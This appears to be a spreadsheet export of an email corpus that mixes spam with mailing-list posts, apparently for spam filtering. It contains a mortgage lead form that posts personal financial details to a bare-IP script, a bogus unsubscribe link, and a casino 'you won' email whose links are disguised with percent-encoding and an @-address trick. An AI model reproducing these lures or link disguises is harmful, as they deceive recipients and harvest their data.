          &lt;table height="191" cellspacing="0" cellpadding="0" width="158" border="0"&gt;
           &lt;tbody&gt;
            &lt;tr&gt;
             &lt;td valign="top" width="12" height="191" rowspan="5"&gt;&lt;img height="5" src="images/spacer.gif" width="10"&gt;&lt;/td&gt;
             &lt;td valign="top" width="155" bgcolor="#333399" height="7"&gt;&lt;img height="5" src="images/spacer.gif" width="5"&gt;&lt;/td&gt;
             &lt;td width="37" colspan="2" height="7"&gt;&lt;img height="5" src="images/spacer.gif" width="5"&gt;&lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
             &lt;td valign="top" width="155" bgcolor="#000000" height="39" rowspan="3"&gt;
              &lt;table cellspacing="1" cellpadding="0" width="100%" border="0"&gt;
               &lt;tbody&gt;
                &lt;tr&gt;
                 &lt;td bgcolor="#ffffff"&gt;
                  &lt;table height="172" cellspacing="0" cellpadding="1" width="100%" border="0"&gt;
                   &lt;tbody&gt;
                    &lt;tr&gt;
                     &lt;td height="16"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;Covering
                      All 50 States&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                    &lt;/tr&gt;
                    &lt;tr&gt;
                     &lt;td height="16"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;3
                      Executive Park Drive&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                    &lt;/tr&gt;
                    &lt;tr&gt;
                     &lt;td height="16"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;Floor 18&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                    &lt;/tr&gt;
                    &lt;tr&gt;
                     &lt;td height="30"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;Newport
                      Beach,&amp;nbsp;CA&lt;br&gt;
                      &amp;nbsp;92661&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                    &lt;/tr&gt;
                    &lt;tr&gt;
                     &lt;td height="16"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;Wholesale
                      Mortgage&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                    &lt;/tr&gt;
                    &lt;tr&gt;
                     &lt;td height="16"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;Office:
                      866-860-6596&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                    &lt;/tr&gt;
                    &lt;tr&gt;
                     &lt;td height="16"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;Fax:
                      714-844-4897&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                    &lt;/tr&gt;
                    &lt;tr&gt;
                     &lt;td height="30"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;&lt;b&gt;Email:
                      Cohen@GMMortgage.com&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                    &lt;/tr&gt;
                   &lt;/tbody&gt;
                  &lt;/table&gt;
                 &lt;/td&gt;
                &lt;/tr&gt;
               &lt;/tbody&gt;
              &lt;/table&gt;
             &lt;/td&gt;
             &lt;td class="Ntiler_yhold" valign="top" width="29" bgcolor="#ffcf63" height="6"&gt;&lt;font color="#ffcf63"&gt;&lt;img height="6" src="Info_Cap_top.gif" width="11"&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;td valign="top" width="27" bgcolor="#ff9a00" rowspan="3"&gt;&amp;nbsp;&lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
             &lt;td class="Ntiler_yhold" width="29" bgcolor="#ffcf63" height="1"&gt;&lt;font color="#ffcf63"&gt;&lt;img height="1" src="images/spacer.gif" width="11"&gt;&lt;/font&gt;&lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
             &lt;td class="Ntiler_yhold" valign="bottom" width="29" bgcolor="#ffcf63" height="6"&gt;&lt;font color="#ffcf63"&gt;&lt;img height="6" src="images/Info_Cap_bottom.gif" width="11"&gt;&lt;/font&gt;&lt;/td&gt;
            &lt;/tr&gt;
            &lt;tr&gt;
             &lt;td valign="top" width="155" bgcolor="#333399" height="7"&gt;&lt;img height="5" src="images/spacer.gif" width="5"&gt;&lt;/td&gt;
             &lt;td valign="top" width="37" colspan="2" height="7"&gt;&lt;img height="5" src="images/spacer.gif" width="5"&gt;&lt;/td&gt;
            &lt;/tr&gt;
           &lt;/tbody&gt;
          &lt;/table&gt;
         &lt;/center&gt;
         &lt;p align="center"&gt;&amp;nbsp;&lt;/p&gt;
         &lt;p align="center"&gt;&lt;img alt="Comstock, Image #KS13993" src="http://63.240.68.51/ImageWarehouse/RF/ThumbnailVersions/0013000/13500-13999/KS13993.JPG" border="0" width="108" height="72"&gt;&lt;/p&gt;
        &lt;/td&gt;
        &lt;center&gt;
        &lt;td width="565" height="606"&gt;
         &lt;table cellspacing="0" cellpadding="0" width="100%" border="0"&gt;
          &lt;tbody&gt;
           &lt;tr&gt;
            &lt;td valign="top" height="10"&gt;&lt;/td&gt;
           &lt;/tr&gt;
          &lt;/tbody&gt;
         &lt;/table&gt;
         &lt;table cellspacing="0" cellpadding="0" width="344" border="0"&gt;
          &lt;tbody&gt;
           &lt;tr valign="top"&gt;
            &lt;td bgcolor="#ffff00" colspan="2" height="3" width="340"&gt;&lt;img height="4" src="http://66.123.113.204/Header.gif" width="324"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
            &lt;td valign="top" width="340" bgcolor="#ffffff"&gt;&lt;b&gt;&lt;font face="Geneva, Arial, Helvetica, san-serif" color="#7361a5" size="2"&gt;&lt;span style="BACKGROUND-COLOR: #ffffff"&gt;Jack
             Cohen and Loan Officers - Promotion&lt;/span&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
            &lt;td valign="top" width="1" bgcolor="#ffffff" height="21"&gt;&amp;nbsp;&lt;/td&gt;
           &lt;/tr&gt;
          &lt;/tbody&gt;
         &lt;/table&gt;
         &lt;p align="center"&gt;&amp;nbsp; &lt;img alt="Comstock, Image #KS9777" src="http://63.240.68.51/ImageWarehouse/RF/ThumbnailVersions/0009000/9500-9999/KS9777.JPG" border="0" width="72" height="108"&gt;&lt;font face="Verdana"&gt;&lt;span style="background-color: #ffffff"&gt;&lt;b&gt;&lt;font color="#FF0000" size="7"&gt;&amp;quot;&lt;u&gt;5
         Days!&lt;/u&gt;&amp;quot;&lt;/font&gt;&lt;/b&gt;&lt;/span&gt;&lt;/font&gt;&lt;img alt="Comstock, Image #KS9777" src="http://63.240.68.51/ImageWarehouse/RF/ThumbnailVersions/0009000/9500-9999/KS9777.JPG" border="0" width="72" height="108"&gt;&lt;font face="Verdana"&gt;&amp;nbsp;&lt;/font&gt;&lt;font face="Century"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/p&gt;
         &lt;p align="center"&gt;&lt;span style="background-color: #ffffff"&gt;&lt;b&gt;&lt;span style="BACKGROUND-COLOR: #ffffff"&gt;&lt;font size="4" face="Verdana"&gt;&lt;font color="#31309C"&gt;We&lt;/font&gt;
         &lt;font color="#FF0000"&gt;will beat &lt;/font&gt;&lt;font color="#31309C"&gt;any&lt;/font&gt;&lt;/font&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;
         &lt;p align="center"&gt;&lt;font size="4" color="#FF0000"&gt;&lt;span style="background-color: #ffffff"&gt;&lt;b&gt;&lt;span style="BACKGROUND-COLOR: #ffffff"&gt;&lt;font face="Verdana"&gt;Mortgage
         Loan Rate.&amp;nbsp;&lt;/font&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/font&gt;
         &lt;p align="center"&gt;&lt;span style="background-color: #ffffff"&gt;&lt;b&gt;&lt;span style="BACKGROUND-COLOR: #ffffff"&gt;&lt;font face="Verdana" color="#333399" size="4"&gt;or
         call&amp;nbsp;&lt;/font&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;
         &lt;p align="center" style="line-height: 100%; margin-top: 0; margin-bottom: 0"&gt;&lt;span style="background-color: #ffffff"&gt;&lt;b&gt;&lt;span style="BACKGROUND-COLOR: #ffffff"&gt;&lt;font face="Verdana" color="#333399" size="4"&gt;(866)
         860-6596&lt;/font&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
         &lt;form action="http://195.205.236.76/cgi-bin/8.pl" method="post" target="_blank"&gt;
          &lt;p align="center" style="line-height: 100%; margin-top: 0; margin-bottom: 0"&gt;&lt;/center&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;center&gt;&lt;/p&gt;
          &lt;table bordercolor="#000000" cellspacing="0" cellpadding="1" align="center" bgcolor="#ffffff" border="0" height="250" width="564"&gt;
           &lt;tr&gt;
            &lt;td bordercolor="#000000" bordercolorlight="#000000" width="279" bgcolor="#31309C" bordercolordark="#000000" height="43" valign="top"&gt;
             &lt;p align="right"&gt;&lt;font color="#FFFF00" size="3"&gt;&lt;strong&gt;&lt;font face="Verdana"&gt;Name: &lt;/font&gt;&lt;/strong&gt;&lt;font face="Verdana"&gt;&lt;input id="text2" style="WIDTH: 185px; HEIGHT: 22px" tabindex="1" maxlength="25" size="30" name="Name"&gt;&lt;strong&gt;*&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
            &lt;/td&gt;
            &lt;td bordercolor="#000000" bordercolorlight="#000000" width="285" bgcolor="#31309C" bordercolordark="#000000" height="43" valign="top"&gt;
             &lt;p align="right"&gt;&lt;font color="#FFFF00" size="3"&gt;&lt;strong&gt;&lt;font face="Verdana"&gt;Contact
             Phone: &lt;/font&gt;&lt;/strong&gt;&lt;font face="Verdana"&gt;&lt;input id="text7" style="WIDTH: 125px; HEIGHT: 22px" tabindex="2" maxlength="15" size="16" name="ContactPhone"&gt;&lt;strong&gt;*&amp;nbsp;&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
            &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
            &lt;td bordercolor="#000000" bordercolorlight="#000000" width="279" bgcolor="#31309C" bordercolordark="#000000" height="44" valign="top"&gt;
             &lt;p align="right"&gt;&lt;font color="#FFFF00" size="3"&gt;&lt;strong&gt;&lt;font face="Verdana"&gt;State:&amp;nbsp;
             &lt;/font&gt;&lt;/strong&gt;&lt;b&gt;&lt;font face="Verdana" size="2"&gt;&lt;input id="text23" style="WIDTH: 184px; HEIGHT: 22px" tabindex="3" size="17" name="State"&gt;&lt;/font&gt;&lt;/b&gt;&lt;strong&gt;&lt;font face="Verdana" size="2"&gt;*&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
            &lt;/td&gt;
            &lt;td bordercolor="#000000" bordercolorlight="#000000" width="285" bgcolor="#31309C" bordercolordark="#000000" height="44" valign="top"&gt;
             &lt;p align="right"&gt;&lt;font color="#FFFF00" size="3"&gt;&lt;strong&gt;&lt;font face="Verdana"&gt;Credit
             Rating: &lt;/font&gt;&lt;/strong&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;select id="select2" style="FONT-SIZE: 8pt" tabindex="4" size="1" name="CreditRating"&gt;
              &lt;option value="Good"&gt;Good (some lates)&lt;/option&gt;
              &lt;option value="Excellent"&gt;Excellent (no lates)&lt;/option&gt;
              &lt;option value="Fair"&gt;Fair (collection)&lt;/option&gt;
              &lt;option value="Poor" selected&gt;Poor (bankruptcy)&lt;/option&gt;
             &lt;/select&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
            &lt;/td&gt;
           &lt;/tr&gt;
          &lt;/center&gt;
          &lt;tr&gt;
           &lt;td width="279" height="44" bgcolor="#31309C" valign="top"&gt;
            &lt;p align="left"&gt;&lt;font color="#FFFF00" size="3"&gt;&lt;strong&gt;&lt;font face="Verdana"&gt;Owed on 1st&lt;/font&gt;&lt;/strong&gt;&lt;font face="Verdana"&gt;&lt;b&gt;
            &lt;/b&gt;&lt;input id="text21" style="FONT-SIZE: 8pt; WIDTH: 44px; HEIGHT: 23px" tabindex="5" size="14" name="MoneyOwed"&gt;
            &lt;/font&gt;&lt;/font&gt;&lt;strong&gt;&lt;font face="Verdana" color="#FFFF00" size="2"&gt;Rate:&lt;/font&gt;&lt;font color="#FFFF00" size="3"&gt;&lt;font face="Verdana"&gt;
            &lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;font color="#FFFF00" size="3"&gt;&lt;font face="Verdana"&gt;&lt;input id="text22" style="font-size: 8pt; width: 37; height: 22" tabindex="6" size="10" name="CurrentInterest"&gt;&lt;strong&gt;%&lt;/strong&gt;&lt;/font&gt;&lt;strong&gt;&lt;font face="Verdana" size="2"&gt;*&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
           &lt;td height="44" bgcolor="#31309C" valign="top" width="285"&gt;
            &lt;p align="right"&gt;&lt;font color="#FFFF00" size="3"&gt;&lt;strong&gt;&lt;font face="Verdana"&gt;Owed on 2nd &lt;/font&gt;&lt;/strong&gt;&lt;font face="Verdana"&gt;&lt;input id="text14" style="FONT-SIZE: 8pt; WIDTH: 52px; HEIGHT: 22px" tabindex="7" size="16" name="MoneyOwed2nd"&gt;
            &lt;/font&gt;&lt;/font&gt;&lt;strong&gt;&lt;font face="Verdana" color="#FFFF00" size="2"&gt;Rate&lt;/font&gt;&lt;font face="Verdana" size="2"&gt;:&lt;/font&gt;&lt;/strong&gt;&lt;font color="#FFFF00" size="3"&gt;&lt;font face="Verdana"&gt;
            &lt;input id="text15" style="font-size: 8pt; width: 31; height: 21" tabindex="8" size="10" name="CurrentInterest2nd"&gt;%&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
          &lt;/tr&gt;
          &lt;center&gt;
          &lt;tr&gt;
           &lt;td height="44" bgcolor="#31309C" valign="top" width="279"&gt;
            &lt;p align="right"&gt;&lt;font color="#FFFF00" size="3"&gt;&lt;strong&gt;&lt;font face="Verdana"&gt;Home Value:&lt;/font&gt;&lt;/strong&gt;&lt;b&gt;&lt;font face="Verdana" size="2"&gt;&lt;input id="text13" style="WIDTH: 129px; HEIGHT: 22px" tabindex="9" size="17" name="HomeValue"&gt;*&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
           &lt;td height="44" bgcolor="#31309C" valign="top" width="285"&gt;
            &lt;p align="right"&gt;&lt;font color="#FFFF00" size="3"&gt;&lt;strong&gt;&lt;font face="Verdana"&gt;Amount
            Requested:&lt;/font&gt;&lt;/strong&gt;&lt;font face="Verdana"&gt; &lt;input id="text17" style="WIDTH: 75px; HEIGHT: 22px" tabindex="10" maxlength="8" size="7" value="$" name="AmountRequested"&gt;&lt;/font&gt;&lt;strong&gt;&lt;font face="Verdana" size="2"&gt;*&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
          &lt;/tr&gt;
          &lt;tr&gt;
           &lt;td colspan="2" height="44" bgcolor="#31309C" valign="top" width="560"&gt;
            &lt;p align="center"&gt;&lt;b&gt;&lt;i&gt;&lt;font face="Verdana" size="3" color="#FFFF00"&gt;What would you like
            to do?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
           &lt;/td&gt;
          &lt;/tr&gt;
          &lt;tr&gt;
           &lt;td valign="top" colspan="2" height="44" bgcolor="#31309C" width="560"&gt;
            &lt;p align="center"&gt;&lt;font face="Verdana" color="#FFFF00" size="3"&gt;&lt;textarea id="TEXTAREA1" style="WIDTH: 524px; HEIGHT: 43px" tabindex="11" name="Comments" cols="52" rows="1"&gt;&lt;/textarea&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
          &lt;/tr&gt;
          &lt;tr&gt;
           &lt;td width="560" colspan="2" height="44" bgcolor="#31309C" valign="top"&gt;
            &lt;p align="center"&gt;&lt;font color="#FFFF00" size="3"&gt;&lt;input id="submit1" style="WIDTH: 85px; COLOR: #000000; HEIGHT: 27px" tabindex="12" type="submit" size="43" value="Submit" name="Submit1"&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
          &lt;/tr&gt;
          &lt;/table&gt;
         &lt;/center&gt;&lt;/td&gt;
        &lt;/tr&gt;
       &lt;/tbody&gt;
      &lt;/table&gt;
      &lt;table cellspacing="0" cellpadding="0" width="750" align="center" border="0"&gt;
       &lt;tbody&gt;
        &lt;tr&gt;
         &lt;td bgcolor="#ff9900" height="2"&gt;&lt;img height="2" src="images/spacer.gif" width="1"&gt;&lt;/td&gt;
        &lt;/tr&gt;
       &lt;/tbody&gt;
      &lt;/table&gt;
      &lt;table cellspacing="0" cellpadding="0" width="750" align="center" border="0"&gt;
       &lt;tbody&gt;
        &lt;tr&gt;
         &lt;td bgcolor="#ffffff"&gt;
          &lt;table cellspacing="0" cellpadding="0" width="750" border="0"&gt;
           &lt;tbody&gt;
            &lt;tr valign="top"&gt;
             &lt;td valign="bottom" width="180"&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td valign="center"&gt;
              &lt;table cellspacing="0" cellpadding="5" width="100%" border="0"&gt;
               &lt;tbody&gt;
                &lt;tr&gt;
                 &lt;td&gt;&lt;/td&gt;
                &lt;/tr&gt;
               &lt;/tbody&gt;
              &lt;/table&gt;
             &lt;/td&gt;
            &lt;/tr&gt;
           &lt;/tbody&gt;
          &lt;/table&gt;
         &lt;/td&gt;
        &lt;/tr&gt;
       &lt;/tbody&gt;
      &lt;/table&gt;
     &lt;/td&gt;
    &lt;/tr&gt;
   &lt;/tbody&gt;
  &lt;/table&gt;
  &lt;/div&gt;
  &lt;table cellspacing="0" cellpadding="0" width="750" align="center" border="0"&gt;
   &lt;tbody&gt;
    &lt;tr bgcolor="#000066"&gt;
     &lt;td width="180"&gt;
      &lt;table cellspacing="0" cellpadding="5" width="180" align="right" border="0"&gt;
       &lt;tbody&gt;
        &lt;tr&gt;
         &lt;td&gt;&amp;nbsp;
         &lt;td valign="bottom" width="121"&gt;&lt;img src="http://www.gmacmortgage.com/images/eoh_logo.gif" width="40" height="40"&gt;&lt;/td&gt;
        &lt;/tr&gt;
       &lt;/tbody&gt;
      &lt;/table&gt;
     &lt;/td&gt;
     &lt;td&gt;
      &lt;table cellspacing="0" cellpadding="5" width="100%" border="0"&gt;
       &lt;tbody&gt;
        &lt;tr&gt;
         &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;a href="Licensing.html"&gt;&lt;font color="#ffffff"&gt;Licensing&lt;/font&gt;&lt;/a&gt;&lt;font color="#ffffff"&gt;
          - &lt;/font&gt;&lt;a href="Privacy.html"&gt;&lt;font color="#ffffff"&gt;Privacy&lt;/font&gt;&lt;/a&gt;&lt;font color="#ffffff"&gt;
          - &lt;/font&gt;&lt;a href="TermsOfUse.html"&gt;&lt;font color="#ffffff"&gt;Terms of Use&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
         &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#ffffff"&gt;
          2002 US Sterns Mortgage&amp;nbsp; Corporation&lt;/font&gt;&lt;font color="#ffffff"&gt;-Equal Housing
          Opportunity&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
        &lt;/tr&gt;
       &lt;/tbody&gt;
      &lt;/table&gt;
     &lt;/td&gt;
    &lt;/tr&gt;
   &lt;/tbody&gt;
  &lt;/table&gt;
  &lt;p align="center"&gt;&lt;a href="mailto:signout@persolangrowthseminars.cavern.pl?Body=Your right to be removed from our email list is fully supported by us. We are currently cleaning all our lists. Please do not alter this remove request. Altering or sending multiple remove requests will default the program and you will not be removed properly. To insure that your email address is removed from our list SIMPLY SEND. DO NOT ALTER NOR SEND MORE THAN ONCE. If you follow these directions your email address will be removed automatically the moment you send. Thank You For Your Cooperation.&amp;amp;Subject=remove"&gt;Remove&lt;/a&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Creative political speech
</t>
  </si>
  <si>
    <t xml:space="preserve">
 http://www.quitpalestine.org./
 Funny as all hell.  So a group of 25 QUIT (Queers Undermining Israeli
 Terrorism) marched into the local starbucks in Berkeley (Of course,
 they pick a safe city like Berkeley, but hey, still funny) and
 'settle' driving away straights and other prior inhabitants with
 supersoakers :)
 Incredibly creative, in my opinion. Not terribly violent (I mean, how
 much damage can you -really-  do with a supersoaker?) but definintely
 a newscatcher.
 Its nice to see folks are finding some creative means to make a point.
  Even if you don't -agree- with it, its a hard sell to say that this
  has been done before.
 &lt;C'mon... I'm just waiting for the uproar from the Conservatives on the
 list ... :-)&gt;
 -- 
 Best regards,
  bitbitch                          mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hi Janet, are you going to call me?                     FQXWEE
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgcolor=3D"#003300"&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT color=3D#ffffff size=3D5&gt;Congratulations, 
 You Won $30 Free&lt;BR&gt;Today At The Internet's Best &amp;amp; Most&lt;BR&gt;Trusted On-=
 Line 
 Casino!&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT color=3D#669966&gt;&lt;FONT color=3D#ffffff size=3D4&gt;To =
 Collect Your 
 $30 Cash &lt;/FONT&gt;&lt;A 
 href=3D"http://members.triposd.uk%41988289key=3D96589521041988289index=3DA=
 21r7P6qW41988289.9619532@%77%77%77.%63%79%62%65%72%78%63%61%73%69%6e%6f.%6=
 3%6f%6d"&gt;&lt;FONT 
 size=3D4&gt;Click Here!&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;A 
 href=3D"http://members.triposd.uk%41988289key=3D96589521041988289index=3DA=
 21r7P6qW41988289.9619532@%77%77%77.%63%79%62%65%72%78%63%61%73%69%6e%6f.%6=
 3%6f%6d"&gt;&lt;IMG 
 alt=3D"Click Here To Collect Your $30 Dollars Free And Start Playing!" 
 src=3D"http://members.triposd.uk%81900955key=3D96589521081900955index=3DA2=
 1r7P6qW81900955.79048@%77%77%77.%70%72%65%73%74%69%67%65%63%61%73%69%6e%6f=
 %63%6f%6d/%70ic/%70%72e%76ie%77%73/%62i%67/%62%6cac%6b%6aac%6b.%6a%70%67"=
 border=3D0&gt;&lt;/A&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT color=3D#ffffff size=3D5&gt;To Collect Your $30 Cash =
 &lt;/FONT&gt;&lt;A 
 href=3D"http://members.triposd.uk%41988289key=3D96589521041988289index=3DA=
 21r7P6qW41988289.9619532@%77%77%77.%63%79%62%65%72%78%63%61%73%69%6e%6f.%6=
 3%6f%6d"&gt;&lt;FONT 
 size=3D5&gt;Click Here!&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;A 
 href=3D"http://members.triposd.uk%41988289key=3D96589521041988289index=3DA=
 21r7P6qW41988289.9619532@%77%77%77.%63%79%62%65%72%78%63%61%73%69%6e%6f.%6=
 3%6f%6d"&gt;&lt;IMG 
 alt=3D"Click Here To Collect Your $30 Dollars Free And Start Playing!" 
 src=3D"http://members.triposd.uk%21362822key=3D96589521021362822index=3DA2=
 1r7P6qW21362822.4140327@%77%77%77.%70%72%65%73%74%69%67%65%63%61%73%69%6e%=
 6f.%63%6f%6d/%70ic/a%77a%72%64%73/%67om%5f%74o%70ca%73i%6eo%5f%64a%72%6b%3=
 1.%67i%66" 
 border=3D0&gt;&lt;/A&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P&gt;
 &lt;form name=3D"form" method=3D"post" action=3D"http://members.triposd.uk%21=
 112141key=3D96589521021112141index=3DA21r7P6qW21112141.7607236@%77%77%77.%=
 63%79%62%65%72%78%63%61%73%69%6e%6f.%63%6f%6d/%72/%70%72oce%73%73%5fc%6cea=
 %6e%6ci%73%74.%70h%70"&gt;
 &lt;DIV align=3Dcenter&gt; 
             &lt;table width=3D"391" border=3D"1" cellspacing=3D"0" cellpaddin=
 g=3D"0" align=3D"center" bordercolor=3D"#000000"&gt;
               &lt;tr&gt; 
                 &lt;td&gt; 
                   &lt;table width=3D"400" border=3D"0" cellspacing=3D"0" cell=
 padding=3D"2" bgcolor=3D"#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt;
             &lt;P&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;This=
  message is sent in compliance of the new 
             e-mail bill:&lt;BR&gt;SECTION 301 Per Section 301, Paragraph (a)(2)(=
 C) of 
             S. 1618,&lt;BR&gt;Further transmissions to you by the sender of this=
  email 
             maybe&lt;BR&gt;stopped at no cost to you by entering your email addr=
 ess 
             to&lt;BR&gt;the form in this email and clicking submit to be 
             automatically&lt;BR&gt;   
                                removed. &lt;/font&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" size=3D2&gt;To be Removed f=
 rom our 
             Opt-In mailing list. Please enter your email address in the pr=
 ovided 
             box below and click remove, thank you. 
       &lt;/FONT&gt;&lt;/P&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;table width=3D"400" border=3D"0" cellspacing=3D"0" cell=
 padding=3D"0" bgcolor=3D"#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt; 
                         &lt;div align=3D"center"&gt; 
                           &lt;input type=3D"hidden" name=3D"subject" value=3D=
 "REMOVE"&gt;
                           &lt;input name=3D"email" size=3D"30" 
            &gt;
                           &lt;input type=3D"submit" name=3D"Submit" value=3D"=
 REMOVE"&gt;
                         &lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;div align=3D"center"&gt;&lt;/div&gt;
                   &lt;div align=3D"center"&gt;&lt;/div&gt;
                   &lt;table width=3D"400" border=3D"0" cellspacing=3D"0" cell=
 padding=3D"0" bgcolor=3D"#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt; 
                         &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, Helveti=
 ca, sans-serif" size=3D"1"&gt;Your 
                           E-mail Address Will Be Immediately Removed From =
 All Mailing Lists&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;&lt;/DIV&gt;
         &lt;/form&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] packaging risks and the reputation of linux distributions
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Brendan Kehoe (brendan@zen.org):
 &gt; As a workaround, the various distributions could use a GPG singature
 &gt; to verify correctness of the file.  Since the distributor's secret key
 &gt; is required to create that signature, it would add a pretty
 &gt; significant step that would have to be taken to make it possible to
 &gt; replace both a rpm or apt file and its accompanying signature.
 There are complex problems inherent in attempts to implement this.
 http://linuxmafia.com/~rick/linux-info/debian-package-signing
 -- 
 Cheers,                        My pid is Inigo Montoya.  You kill -9    
 Rick Moen                      my parent process.  Prepare to vi.
 rick@linuxmafia.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Two in court on IRA spy charges
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8628741,215/
 Date: 2002-10-07T09:29:58+01:00
 *Politics:* Stormont near collapse as Sinn Fein protests at allegations.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] UPPERCASE_* rules and foreign character sets
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 29, 2002 at 11:37:02AM +0100, Clayton, Nik [IT] wrote:
 &gt; Have the UPPERCASE_* rules been tested on messages in non-English 
 &gt; character sets, and/or where the message is MIME encoded in some way?
 &gt; 
 &gt; I'm getting a lot of false positives on Japanese mail, and I think the 
 &gt; encoding is responsible for triggering this rule.
 Like Justin said, this is fixed in CVS.
 Dan.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</si>
  <si>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$250,000 for only $6.50 per month.                    qkdjtqsscr
</t>
  </si>
  <si>
    <t xml:space="preserve">When America's top companies compete for your business, you win.
 In today's world, it's important to expect the unexpected. When preparing for the future, we must always consider our family. To plan for your family's future, the right life insurance policy is a necessity. But who wants to pay too much for life insurance? Let us help you find the right quote, quickly and easily...
 Compare your coverage...
 $250,000... as low as $6.50 per month.
 $500,000... as low as $9.50 per month.
